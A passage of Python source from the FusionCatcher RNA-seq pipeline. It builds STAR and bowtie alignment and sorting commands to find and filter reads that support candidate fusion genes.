        job.add('--input_fusion_psl',outdir('candidates_fusion_genes_reads_blat.txt'),kind='input',temp_path=temp_flag)
        job.add('--input_unmapped_reads',outdir('reads_ids_unmapped.txt'),kind='input')
        job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no')
        if options.psl_visualization and not empty(datadir('genome.2bit')):
            job.add('--input_genome_2bit',datadir('genome.2bit'),kind='input')
            job.add('--psl_alignment_type','web',kind='parameter')
            if _BT_:
                job.add('--blat-dir',_BT_,kind='parameter')
        if options.sam_visualization:
            job.add('--input_genome_bowtie2',datadir('genome_index2/index'),kind='input')
            job.add('--sam_alignment','20',kind='parameter')
            job.add('--threads',options.processes,kind='parameter')
            if _B2_:
                job.add('--bowtie2-dir',_B2_,kind='parameter')
        if options.assembly:
            job.add('--velvet',kind='parameter')
            if _VT_:
                job.add('--velvet-dir',_VT_,kind='parameter')
        job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_BLAT.txt'),kind='output')
        job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_BLAT.zip'),kind='output')
        job.run()

    ################################################################################
    # STAR alignment
    ################################################################################

    if (not options.skip_star) and job.iff(not empty(outdir('reads_gene-gene_no-str.fq')), id = "#reads_gene-gene_no-str.fq-3#"):

        # STAR removes the /1 and /2 suffixes from the read names, so change
        # "/1" and "/2" into "-1" and "-2" beforehand such that STAR cannot remove them
        job.add('LC_ALL=C',kind='program')
        job.add('sed',kind='parameter')
        job.add("""'s/\/\([1-2]$\)/\-\\1/;n;n;n'""",outdir('reads_gene-gene_no-str.fq'),kind='input')
        job.add('>',outdir('reads_gene-gene_no-str_fixed.fq'),kind='output')
        job.run()

        if os.path.exists(outdir('log_lengths_reads_gene-gene_no-str.txt')):
            sdjboverhang = int(float(file(outdir('log_lengths_reads_gene-gene_no-str.txt'),'r').readline().strip())) - 1
            file(outdir('star_sdjboverhang.txt'),'w').write("%d" % (sdjboverhang,))

        genomesaindexnbases = int(min(14, math.log(nucleotides_gg,2)/(float(2)) - 1))
        genomechrbinnbits = int(min(18, math.log(float(nucleotides_gg)/float(sequences_gg),2)))

        # find available memory
        job.add('printf',kind='program')
        job.add('"\n============\nMEMORY (before using STAR):\n============\n"',kind='parameter')
        job.add('>>',info_file,kind='output')
        job.run()

        job.add('free',kind='program')
        job.add('-m',kind='parameter')
        job.add('>>',info_file,kind='output')
        job.run()

        if nucleotides_gg > options.limit_star:

            job.add(_FC_+'split-fasta.py',kind='program')
            job.add('--size',outdir('gene-gene__nuc.txt'),kind='input')
            job.add('--seqs',outdir('gene-gene__seq.txt'),kind='input')
            job.add('--threshold',options.limit_star,kind='parameter')
            job.add('-i',outdir('gene-gene.fa'),kind='input')
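            # NOTE: the gene-gene reference is split here so that each chunk stays below
            # options.limit_star bases; every chunk then gets its own STAR index, which is
            # presumably what keeps the genomeGenerate step within the available RAM.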
job.add('-o',outdir('gene-gene_split_star.fa'),kind='output') job.add('-x',outdir('gene-gene_split_star.len'),kind='output') job.run() parts = [el.strip() for el in file(outdir('gene-gene_split_star.fa'),'r').readlines()] maxlens = [el.strip() for el in file(outdir('gene-gene_split_star.len'),'r').readlines()] for i,part in enumerate(parts): # get the length of the FASTA file # job.add('du',kind='program') # job.add('-b',part,kind='input') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('cut',kind='parameter') # job.add('-f','1',kind='parameter') # job.add('>',part+'.len',kind='output') # job.run() # get the length of the FASTA file job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-v','"^>"',kind='parameter') job.add('',part,kind='input') job.add('|',kind='parameter') job.add('wc',kind='parameter') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add("'{print $3-$1}'",kind='parameter') job.add('>',part+'.len',kind='output') job.run() #grep -v ">" file.fasta | wc | awk '{print $3-$1}' genomesaindexnbases = int(min(14, math.log(100,2)/(float(2)) - 1)) if os.path.exists(part+'.len'): ti = file(part+'.len','r').readline().strip() lenparts = len(parts) genomesaindexnbases = int(min(14, math.log(float(ti),2)/(float(2)) - 1)) #genomechrbinnbits = int(min(18, math.log(float(t)/(math.ceil(float(sequences_gg)/float(lenparts)))+2,2))) job.clean(part+'.len',temp_path=temp_flag) # build the STAR index gd = "%s_star/" % (part,) gdr = "%s_star-results/" % (part,) job.add(_SR_+'STAR',kind='program') job.add('--genomeChrBinNbits',genomechrbinnbits,kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases,kind='parameter') job.add('--runMode','genomeGenerate',kind='parameter') if star25: job.add('--genomeSuffixLengthMax','10000',kind='parameter') # for STAR 2.5.x job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--genomeDir',gd,kind='output') job.add('--genomeFastaFiles',part,kind='input') job.add('--outFileNamePrefix',gd,kind='output') job.run() # t = "[from file: '%s']" % (maxlens[i],) # #if job.run(): # if os.path.exists(maxlens[i]): # t = file(maxlens[i],'r').readline().strip() # align the unmapped reads using STAR on candidate fusion gene-gene job.add(_SR_+'STAR',kind='program') job.add('--runRNGseed','54321',kind='parameter') #job.add('--twopass1readsN',outdir('log_counts_reads_gene-gene_no-str.txt'),kind='parameter',from_file='yes') job.add('--twopass1readsN','-1',kind='parameter') job.add('--twopassMode','Basic',kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases,kind='parameter') job.add('--sjdbOverhang',outdir('star_sdjboverhang.txt'),kind='parameter',from_file='yes') #job.add('--alignIntronMax',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 'yes') job.add('--alignIntronMax',maxlens[i],kind='parameter',from_file = 'yes') if options.skip_star_bowtie: job.add('--outFilterMatchNmin',int(float(min_len_reads)*0.90),kind='parameter') job.add('--outFilterMatchNminOverLread','0.90',kind='parameter') job.add('--outFilterScoreMinOverLread','0.90',kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate','0.90',kind='parameter') # NEW in v0.99.4b else: perc = 0.40 # 0.49 if eporcrlf2igh: perc = float("%.4f" % ((float(length_anchor_minimum - 1) / float(min_len_reads)),)) job.add('--outFilterMatchNmin',int(float(min_len_reads)*perc),kind='parameter') job.add('--outFilterMatchNminOverLread',perc,kind='parameter') 
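                    # NOTE: perc is the minimum fraction of a read that STAR must align;
                    # when eporcrlf2igh is set it is relaxed to about
                    # (length_anchor_minimum-1)/min_len_reads so that reads with shorter
                    # split anchors still survive this filter.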
job.add('--outFilterScoreMinOverLread',perc,kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate',perc,kind='parameter') # NEW in v0.99.4b job.add('--genomeDir',gd,kind='input',temp_path=temp_flag) job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--seedSearchStartLmax',length_anchor_star-1,kind='parameter') # 20 # default is: 50 job.add('--alignSJoverhangMin',length_anchor_star-1,kind='parameter') # 9 # default is 5? # NEW in v0.99.4b if star25: job.add('--alignSJstitchMismatchNmax','5 -1 5 5',kind='parameter')# default is: 0 -1 0 0 # added in STAR 2.5.x job.add('--outSJfilterOverhangMin','10 10 10 10',kind='parameter')# default is: 30 12 12 12 ("non-canonical motifs","GT/AG"motif,"GC/AG"motif,"AT/AC"motif) job.add('--outSJfilterCountUniqueMin','1 1 1 1',kind='parameter')# default is: 3 1 1 1 job.add('--outSJfilterCountTotalMin','1 1 1 1',kind='parameter')# default is: 3 1 1 1 job.add('--outSJfilterDistToOtherSJmin','0 0 0 0',kind='parameter')# default is: 10 0 5 10 job.add('--outSJfilterIntronMaxVsReadN',maxlens[i],kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('',maxlens[i],kind='parameter',from_file='yes')# default is: 50000 100000 200000 job.add('',maxlens[i],kind='parameter',from_file='yes')# default is: 50000 100000 200000 #job.add('--outSJfilterIntronMaxVsReadN','%s %s %s' % (t,t,t),kind='parameter')# default is: 50000 100000 200000 job.add('--limitOutSAMoneReadBytes','100000000',kind='parameter') job.add('--scoreGapNoncan','-4',kind='parameter') # should it be -2? job.add('--scoreGapATAC','-4',kind='parameter') if is_optparse_provided(parser,'limitSjdbInsertNsj'): job.add('--limitSjdbInsertNsj',options.limitSjdbInsertNsj,kind='parameter') if is_optparse_provided(parser,'limitOutSJcollapsed'): job.add('--limitOutSJcollapsed',options.limitOutSJcollapsed,kind='parameter') job.add('--readFilesIn',outdir('reads_gene-gene_no-str_fixed.fq'),kind='input') job.add('--outFileNamePrefix',gdr,kind='output') job.add('--outFileNamePrefix',os.path.join(gdr,'Aligned.out.sam'),kind='output',command_line = 'no') job.run() job.add('LC_ALL=C',kind='program') job.add('sed',kind='parameter') job.add("""'s/\-\([1-2]\\t\)/\/\\1/'""",os.path.join(gdr,'Aligned.out.sam'),kind='input') job.add("",gdr,kind='input',temp_path=temp_flag,command_line='no') job.add('|',kind='parameter') job.add('sam2psl.py',kind='parameter') job.add('--input','-',kind='parameter') job.add('--output','-',kind='output') #job.add('--output',outdir('gene-gene-star.psl.')+str(i),kind='output',dest_list='genegenestar') #job.run() job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('gene-gene-star.psl.')+str(i),kind='output') job.run() if options.skip_star_bowtie: job.clean(part,temp_path=temp_flag) job.link(outdir('gene-gene-star.psl.')+str(i), outdir('gene-gene-star_more.psl.')+str(i), 
temp_path=temp_flag, dest_list='genegenestar') else: job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('gene-gene-star.psl.')+str(i),kind='input') job.add('--output',outdir('gene-gene-star_final.psl.')+str(i),kind='output',temp_path=temp_flag) job.add('--clipped-reads-ids',outdir('reads-ids_clip_psl_star.txt.')+str(i),kind='output') job.add('--clipped-reads-refs',outdir('reads-refs_clip_psl_star.txt.')+str(i),kind='output') job.add('--clip-min',length_anchor_star,kind='parameter') job.run() if job.iff(empty(outdir('reads-ids_clip_psl_star.txt.')+str(i)),id = "#reads-ids-clip-psl-star."+str(i)+"#"): job.clean(outdir('reads-ids_clip_psl_star.txt.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-refs_clip_psl_star.txt.')+str(i),temp_path=temp_flag) job.clean(part,temp_path=temp_flag) else: job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-ids_clip_psl_star.txt.')+str(i),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl_uniq.txt.')+str(i),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f1',outdir('reads-ids_clip_star_psl_uniq.txt.')+str(i),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('subseq',kind='parameter') job.add('',outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('-',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl.fq.')+str(i),kind='output') job.run() job.add(_FC_+'split-reads.py',kind='program') job.add('--input',outdir('reads-ids_clip_star_psl.fq.')+str(i),kind='input') job.add('--list',outdir('reads-ids_clip_star_psl_uniq.txt.')+str(i),kind='input') job.add('--wiggle-size',options.rescue_wiggle_size,kind='parameter') job.add('--gap-size',options.rescue_gap_size,kind='parameter') job.add('--anchor-size',length_anchor_minimum,kind='parameter') job.add('--output-1',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='output') job.add('--output-2',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='output') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') job.run(error_message = ("If this fails due to a memory error then lowering the "+ "buffer size (to 50% or 
25%) using the command line option --extra-buffer-size "+ "of FusionCatcher and running it again might help!")) job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-refs_clip_psl_star.txt.')+str(i),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-refs_clip_star_psl_uniq.txt.')+str(i),kind='output') job.run() # some pre-filtering of splitting reads (filter out the split reads which map on one gene) job.add('LC_ALL=C',kind='program') job.add('cat',kind='parameter') job.add('',outdir('reads-refs_clip_star_psl_uniq.txt.')+str(i),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('tr',kind='parameter') job.add('"|"',kind='parameter') job.add('"\\t"',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('cut',kind='parameter') job.add('-f',"1,2",kind='parameter') job.add('|',kind='parameter') job.add('tr',kind='parameter') job.add('"\\t"',kind='parameter') job.add('"\\n"',kind='parameter') job.add('|',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') # unique job.add('|',kind='parameter') job.add('sed',kind='parameter') job.add("'1{/^$/d}'",kind='parameter') # delete first line if it empty (that contains only newline) job.add('>',outdir('reads-refs_clip_star_psl_uniq_more.txt.')+str(i),kind='output') job.run() gdau = "%s_bowtie_star_unique.fa" % (part,) job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('gene-gene_unique.fa'),kind='input') job.add('',outdir('reads-refs_clip_star_psl_uniq_more.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('>',gdau,kind='output') job.run() gdbu = "%s_bowtie_star_unique/" % (part,) job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',outdir('gene-gene.fa'),kind='input') job.add('',gdau,kind='input',temp_path=temp_flag) job.add('',gdbu,kind='output',checksum='no') job.add('',gdbu,kind='output',command_line='no') job.run() # map using bowtie # filter out reads not mapping ms = min(options.mismatches,2) if options.skip_fastqtk: job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='input') else: job.add(_FK_+'fastqtk',kind='program') job.add('interleave',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'sliding-read.py',kind='parameter') job.add('--window','33',kind='parameter') job.add('--step','15',kind='parameter') 
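                        # NOTE: sliding-read.py appears to tile each interleaved read into
                        # 33-bp windows taken every 15 bp, so that a piece lying entirely on
                        # one side of a candidate junction can be mapped by the bowtie call below.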
job.add('-i','-',kind='parameter') job.add('-o','-',kind='parameter') job.add('|',kind='parameter') job.add(_BE_+'bowtie',kind='parameter') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-k','1',kind='parameter') job.add('-v',ms,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') # job.add('--trim5','10',kind='parameter') # job.add('--trim3','10',kind='parameter') job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') job.add('--suppress','2,3,4,5,6,7,8',kind='parameter') if os.path.isfile(os.path.join(gdbu,'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',gdbu,kind='input') job.add('-',kind='parameter') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-temp.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('|',kind='parameter') if eporcrlf2igh == False: job.add('awk',kind='parameter') job.add('',"""'{n=length($0); if (olde=="a" && substr($0,0,n-1)==old && substr($0,n,1)=="b") {print old"a\\n"$0; old="";} {old=substr($0,0,n-1); olde=substr($0,n,1);}}'""",kind='parameter') else: job.add('awk',kind='parameter') job.add("""'{n=length($0); r=substr($0,1,n-1); print r"a"; print r"b"}'""",kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('reads_filtered_unique_cuts_star.txt.')+str(i),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='input') job.add('',outdir('reads_filtered_unique_cuts_star.txt.')+str(i),kind='input') job.add('>',outdir('reads-ids_clip_star_psl_r1r1.fq.')+str(i),kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='input') job.add('',outdir('reads_filtered_unique_cuts_star.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('>',outdir('reads-ids_clip_star_psl_r2r2.fq.')+str(i),kind='output') job.run() # this is for the case when the out from the previous command is empty (then it takes the first read) if job.iff(empty(outdir('reads-ids_clip_star_psl_r1r1.fq.')+str(i)),id = "##reads-ids_clip_star_psl_r1r1.fq."+str(i)+"##"): 
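                            # presumably needed because the downstream paired-end bowtie
                            # mapping cannot cope with completely empty FASTQ input files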
                            job.add('head',kind='program')
                            job.add('-4',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='input')
                            job.add('>',outdir('reads-ids_clip_star_psl_r1r1-t.fq.')+str(i),kind='output')
                            job.run()

                            job.add('head',kind='program')
                            job.add('-4',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='input')
                            job.add('>',outdir('reads-ids_clip_star_psl_r2r2-t.fq.')+str(i),kind='output')
                            job.run()

                            job.clean(outdir('reads-ids_clip_star_psl_r1r1.fq.')+str(i),temp_path=temp_flag)
                            job.clean(outdir('reads-ids_clip_star_psl_r2r2.fq.')+str(i),temp_path=temp_flag)
                        else:
                            job.link(outdir('reads-ids_clip_star_psl_r1r1.fq.')+str(i),
                                     outdir('reads-ids_clip_star_psl_r1r1-t.fq.')+str(i),
                                     temp_path=temp_flag)
                            job.link(outdir('reads-ids_clip_star_psl_r2r2.fq.')+str(i),
                                     outdir('reads-ids_clip_star_psl_r2r2-t.fq.')+str(i),
                                     temp_path=temp_flag)

                        # map using bowtie
                        ms = min(options.mismatches,2)
                        job.add(_BE_+'bowtie',kind='program')
                        job.add('--seed',bowtie_seed,kind='parameter')
                        job.add('-t',kind='parameter')
                        job.add('-k','1',kind='parameter')
                        job.add('-v',ms,kind='parameter')
                        job.add('-p',options.processes,kind='parameter',checksum='no')
                        job.add('-X',maxlens[i],kind='parameter',from_file="yes")
                        job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no')
                        job.add('--ff',kind='parameter')
                        job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'.fq'),kind='output',checksum='no') # unmapped reads
                        job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1.fq'),kind='output',command_line='no') # unmapped reads
                        job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2.fq'),kind='output',command_line='no') # unmapped reads
                        job.add('--max',outdir('reads-ids_clip_star_psl_max_filtered.fq.')+str(i),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un'
                        if os.path.isfile(os.path.join(gdbu,'.1.ebwtl')):
                            job.add('--large-index',kind='parameter')
                        job.add('',gdbu,kind='input',temp_path=temp_flag)
                        job.add('-1',outdir('reads-ids_clip_star_psl_r1r1-t.fq.')+str(i),kind='input',temp_path=temp_flag)
                        job.add('-2',outdir('reads-ids_clip_star_psl_r2r2-t.fq.')+str(i),kind='input',temp_path=temp_flag)
                        job.add('',outdir('split_gene-gene_star_filtered.sam.')+str(i),kind='output',temp_path=temp_flag)
                        job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag)
                        job.run()

                        # this is for the case when the output of the previous command is empty (then it takes the first read)
                        if job.iff(empty(outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1.fq')),id = "##reads-ids_clip_star_psl_unmapped_filtered-"+str(i)+"_1.fq##"):
                            job.add('head',kind='program')
                            job.add('-4',outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),kind='input',temp_path=temp_flag)
                            job.add('>',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1_t.fq'),kind='output')
                            job.run()

                            job.add('head',kind='program')
                            job.add('-4',outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),kind='input',temp_path=temp_flag)
                            job.add('>',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2_t.fq'),kind='output')
                            job.run()

                            job.clean(outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1.fq'),temp_path=temp_flag)
                            job.clean(outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2.fq'),temp_path=temp_flag)
                        else:
                            job.link(outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1.fq'),
                                     outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1_t.fq'),
                                     temp_path=temp_flag)
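                            # the *_t copies presumably exist so that the paired-end bowtie
                            # run below always sees the same file names, whether or not the
                            # empty-input fallback above was taken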
job.link(outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2.fq'), outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2_t.fq'), temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_r1.fq.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_r2.fq.')+str(i),temp_path=temp_flag) gda = "%s_bowtie_star.fa" % (part,) job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',part,kind='input',temp_path=temp_flag) job.add('',outdir('reads-refs_clip_star_psl_uniq.txt.')+str(i),kind='input',temp_path=temp_flag) job.add('>',gda,kind='output') job.run() gdb = "%s_bowtie_star/" % (part,) job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',part,kind='input',temp_path=temp_flag) job.add('',gda,kind='input',temp_path=temp_flag if options.skip_ig_star and eporcrlf2igh == False else 'no') job.add('',gdb,kind='output',checksum='no') job.add('',gdb,kind='output',command_line='no') job.run() # map using bowtie job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(gdb,'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if options.ff_tryhard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--sam',kind='parameter') job.add('--ff',kind='parameter') job.add('--un',outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('reads-ids_clip_star_psl_max.fq.')+str(i),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' #job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes") job.add('-X',maxlens[i],kind='parameter',from_file="yes") job.add('',gdb,kind='input') job.add('-1',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_1_t.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_star_psl_unmapped_filtered-'+str(i)+'_2_t.fq'),kind='input',temp_path=temp_flag) if bowtie121: job.add('',outdir('split_gene-gene_star.sam.')+str(i),kind='output') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) else: job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt.')+str(i),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('>',outdir('split_gene-gene_star.sam.')+str(i),kind='output') job.run() job.add(_FC_+'merge-sam.py',kind='program') 
                        job.add('--input',outdir('split_gene-gene_star.sam.')+str(i),kind='input',temp_path=temp_flag)
                        job.add('--output',outdir('split_gene-gene_star_patch.sam.')+str(i),kind='output')
                        job.run()

                        job.add(_FC_+'sam2psl.py',kind='program')
                        job.add('--input',outdir('split_gene-gene_star_patch.sam.')+str(i),kind='input',temp_path=temp_flag)
                        #job.add('--output',outdir('split_gene-gene_star_patch.psl.')+str(i),kind='output')
                        job.add('--output','-',kind='parameter')
                        job.add('|',kind='parameter')
                        job.add('LC_ALL=C',kind='parameter')
                        job.add('sort',kind='parameter')
                        job.add('-k','10,10',kind='parameter')
                        job.add('-k','14,14',kind='parameter')
                        job.add('-k','12,12n',kind='parameter')
                        job.add('-k','13,13n',kind='parameter')
                        job.add('-t',"'\t'",kind='parameter')
                        if sort_buffer:
                            job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no')
                        if sort_parallel:
                            job.add('--parallel',options.processes,kind='parameter',checksum='no')
                        if sort_lzop_compress:
                            job.add('--compress-program','lzop',kind='parameter',checksum='no')
                        elif sort_gzip_compress:
                            job.add('--compress-program','gzip',kind='parameter',checksum='no')
                        job.add('-T',tmp_dir,kind='parameter',checksum='no')
                        job.add('>',outdir('split_gene-gene_star_patch.psl.')+str(i),kind='output')
                        job.run()

                        job.add(_FC_+'analyze_splits_sam.py',kind='program')
                        job.add('--input',outdir('split_gene-gene_star_patch.psl.')+str(i),kind='input',temp_path=temp_flag)
                        job.add('--output',outdir('split_gene-gene_star_final.psl.')+str(i),kind='output')
                        job.add('--remove-extra',kind='parameter')
                        job.run()

                        if job.iff(empty(outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_1.fq')) or eporcrlf2igh == False,id = "#reads-ids_clip_star_psl_unmapped-"+str(i)+"_1#"):
                            job.clean(outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_1.fq'),temp_path=temp_flag)
                            job.clean(outdir('reads-ids_clip_star_psl_unmapped-'+str(i)+'_2.fq'),temp_path=temp_flag)
